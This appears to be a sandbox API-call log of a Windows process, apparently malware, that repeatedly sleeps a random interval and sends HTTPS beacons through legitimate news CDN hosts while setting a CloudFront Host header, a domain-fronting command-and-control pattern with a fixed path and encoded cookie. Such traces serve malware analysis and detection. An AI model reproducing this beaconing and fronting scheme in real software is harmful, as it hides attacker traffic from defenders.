[0528.504] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0528.504] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0528.504] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x20, wMilliseconds=0x33f))
[0528.504] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0528.504] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0528.504] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0528.504] Sleep (dwMilliseconds=0x318a)
[0538.521] GetLastError () returned 0x0
[0538.521] SetLastError (dwErrCode=0x0)
[0538.521] GetLastError () returned 0x0
[0538.521] SetLastError (dwErrCode=0x0)
[0538.521] GetLastError () returned 0x0
[0538.521] SetLastError (dwErrCode=0x0)
[0538.521] GetLastError () returned 0x0
[0538.521] SetLastError (dwErrCode=0x0)
[0538.521] GetLastError () returned 0x0
[0538.521] SetLastError (dwErrCode=0x0)
[0538.522] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0538.522] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0538.522] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0538.522] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] htonl (hostlong=0xa000000) returned 0xa
[0538.522] htonl (hostlong=0x22000000) returned 0x22
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] htonl (hostlong=0xa000000) returned 0xa
[0538.522] htonl (hostlong=0x47000000) returned 0x47
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] htonl (hostlong=0xa000000) returned 0xa
[0538.522] htonl (hostlong=0x1f000000) returned 0x1f
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] htonl (hostlong=0x7000000) returned 0x7
[0538.522] htonl (hostlong=0x0) returned 0x0
[0538.522] htonl (hostlong=0x8000000) returned 0x8
[0538.522] htonl (hostlong=0x2000000) returned 0x2
[0538.522] htonl (hostlong=0x8000000) returned 0x8
[0538.522] htonl (hostlong=0x6000000) returned 0x6
[0538.522] htonl (hostlong=0x6000000) returned 0x6
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] htonl (hostlong=0x0) returned 0x0
[0538.522] GetLastError () returned 0x0
[0538.522] SetLastError (dwErrCode=0x0)
[0538.522] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0538.522] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0538.522] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0538.522] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0539.199] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0539.199] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0539.199] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0539.199] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x2b, wMilliseconds=0x20b))
[0539.199] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0539.199] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0539.199] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x2b, wMilliseconds=0x20b))
[0539.199] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x337498) returned 1
[0539.199] CryptGenRandom (in: hProv=0x337498, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0539.199] CryptReleaseContext (hProv=0x337498, dwFlags=0x0) returned 1
[0539.199] Sleep (dwMilliseconds=0x3579)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] GetLastError () returned 0x0
[0549.202] SetLastError (dwErrCode=0x0)
[0549.202] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0549.202] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0549.202] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0549.202] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] htonl (hostlong=0xa000000) returned 0xa
[0549.203] htonl (hostlong=0x22000000) returned 0x22
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] htonl (hostlong=0xa000000) returned 0xa
[0549.203] htonl (hostlong=0x47000000) returned 0x47
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] htonl (hostlong=0xa000000) returned 0xa
[0549.203] htonl (hostlong=0x1f000000) returned 0x1f
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] htonl (hostlong=0x7000000) returned 0x7
[0549.203] htonl (hostlong=0x0) returned 0x0
[0549.203] htonl (hostlong=0x8000000) returned 0x8
[0549.203] htonl (hostlong=0x2000000) returned 0x2
[0549.203] htonl (hostlong=0x8000000) returned 0x8
[0549.203] htonl (hostlong=0x6000000) returned 0x6
[0549.203] htonl (hostlong=0x6000000) returned 0x6
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] htonl (hostlong=0x0) returned 0x0
[0549.203] GetLastError () returned 0x0
[0549.203] SetLastError (dwErrCode=0x0)
[0549.203] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0549.203] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0549.203] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0549.203] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0549.870] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0549.870] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0549.870] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0549.870] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x36, wMilliseconds=0xba))
[0549.870] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0549.870] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0549.870] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x25, wSecond=0x36, wMilliseconds=0xba))
[0549.870] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x337af8) returned 1
[0549.870] CryptGenRandom (in: hProv=0x337af8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0549.870] CryptReleaseContext (hProv=0x337af8, dwFlags=0x0) returned 1
[0549.870] Sleep (dwMilliseconds=0x3994)
[0559.873] GetLastError () returned 0x0
[0559.873] SetLastError (dwErrCode=0x0)
[0559.873] GetLastError () returned 0x0
[0559.873] SetLastError (dwErrCode=0x0)
[0559.873] GetLastError () returned 0x0
[0559.873] SetLastError (dwErrCode=0x0)
[0559.873] GetLastError () returned 0x0
[0559.873] SetLastError (dwErrCode=0x0)
[0559.873] GetLastError () returned 0x0
[0559.873] SetLastError (dwErrCode=0x0)
[0559.874] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0559.874] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0559.874] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0559.874] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] htonl (hostlong=0xa000000) returned 0xa
[0559.874] htonl (hostlong=0x22000000) returned 0x22
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] htonl (hostlong=0xa000000) returned 0xa
[0559.874] htonl (hostlong=0x47000000) returned 0x47
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] htonl (hostlong=0xa000000) returned 0xa
[0559.874] htonl (hostlong=0x1f000000) returned 0x1f
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] htonl (hostlong=0x7000000) returned 0x7
[0559.874] htonl (hostlong=0x0) returned 0x0
[0559.874] htonl (hostlong=0x8000000) returned 0x8
[0559.874] htonl (hostlong=0x2000000) returned 0x2
[0559.874] htonl (hostlong=0x8000000) returned 0x8
[0559.874] htonl (hostlong=0x6000000) returned 0x6
[0559.874] htonl (hostlong=0x6000000) returned 0x6
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] htonl (hostlong=0x0) returned 0x0
[0559.874] GetLastError () returned 0x0
[0559.874] SetLastError (dwErrCode=0x0)
[0559.874] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0559.874] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0559.874] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0559.874] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0560.562] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0560.562] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0560.562] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0560.562] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x4, wMilliseconds=0x370))
[0560.562] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0560.562] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0560.562] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x4, wMilliseconds=0x370))
[0560.562] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3378d8) returned 1
[0560.563] CryptGenRandom (in: hProv=0x3378d8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0560.563] CryptReleaseContext (hProv=0x3378d8, dwFlags=0x0) returned 1
[0560.563] Sleep (dwMilliseconds=0x34f9)
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0570.578] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0570.578] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0570.578] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] htonl (hostlong=0xa000000) returned 0xa
[0570.578] htonl (hostlong=0x22000000) returned 0x22
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] htonl (hostlong=0xa000000) returned 0xa
[0570.578] htonl (hostlong=0x47000000) returned 0x47
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] htonl (hostlong=0xa000000) returned 0xa
[0570.578] htonl (hostlong=0x1f000000) returned 0x1f
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] htonl (hostlong=0x7000000) returned 0x7
[0570.578] htonl (hostlong=0x0) returned 0x0
[0570.578] htonl (hostlong=0x8000000) returned 0x8
[0570.578] htonl (hostlong=0x2000000) returned 0x2
[0570.578] htonl (hostlong=0x8000000) returned 0x8
[0570.578] htonl (hostlong=0x6000000) returned 0x6
[0570.578] htonl (hostlong=0x6000000) returned 0x6
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.578] htonl (hostlong=0x0) returned 0x0
[0570.578] GetLastError () returned 0x0
[0570.578] SetLastError (dwErrCode=0x0)
[0570.579] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0570.579] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0570.579] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0570.579] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0571.249] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0571.249] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0571.249] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0571.250] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0xf, wMilliseconds=0x239))
[0571.250] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0571.250] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0571.250] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0xf, wMilliseconds=0x239))
[0571.250] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383b50) returned 1
[0571.250] CryptGenRandom (in: hProv=0x383b50, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0571.250] CryptReleaseContext (hProv=0x383b50, dwFlags=0x0) returned 1
[0571.250] Sleep (dwMilliseconds=0x3804)
[0581.265] GetLastError () returned 0x0
[0581.265] SetLastError (dwErrCode=0x0)
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0581.266] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0581.266] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0581.266] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] htonl (hostlong=0xa000000) returned 0xa
[0581.266] htonl (hostlong=0x22000000) returned 0x22
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] htonl (hostlong=0xa000000) returned 0xa
[0581.266] htonl (hostlong=0x47000000) returned 0x47
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] htonl (hostlong=0xa000000) returned 0xa
[0581.266] htonl (hostlong=0x1f000000) returned 0x1f
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] htonl (hostlong=0x7000000) returned 0x7
[0581.266] htonl (hostlong=0x0) returned 0x0
[0581.266] htonl (hostlong=0x8000000) returned 0x8
[0581.266] htonl (hostlong=0x2000000) returned 0x2
[0581.266] htonl (hostlong=0x8000000) returned 0x8
[0581.266] htonl (hostlong=0x6000000) returned 0x6
[0581.266] htonl (hostlong=0x6000000) returned 0x6
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] htonl (hostlong=0x0) returned 0x0
[0581.266] GetLastError () returned 0x0
[0581.266] SetLastError (dwErrCode=0x0)
[0581.266] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0581.266] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0581.266] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0581.266] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0581.936] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0581.936] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0581.936] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0581.936] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x1a, wMilliseconds=0xfb))
[0581.936] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0581.936] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0581.936] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x1a, wMilliseconds=0xfb))
[0581.936] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383930) returned 1
[0581.936] CryptGenRandom (in: hProv=0x383930, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0581.936] CryptReleaseContext (hProv=0x383930, dwFlags=0x0) returned 1
[0581.937] Sleep (dwMilliseconds=0x326f)
[0591.940] GetLastError () returned 0x0
[0591.940] SetLastError (dwErrCode=0x0)
[0591.940] GetLastError () returned 0x0
[0591.940] SetLastError (dwErrCode=0x0)
[0591.940] GetLastError () returned 0x0
[0591.940] SetLastError (dwErrCode=0x0)
[0591.940] GetLastError () returned 0x0
[0591.940] SetLastError (dwErrCode=0x0)
[0591.940] GetLastError () returned 0x0
[0591.940] SetLastError (dwErrCode=0x0)
[0591.941] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
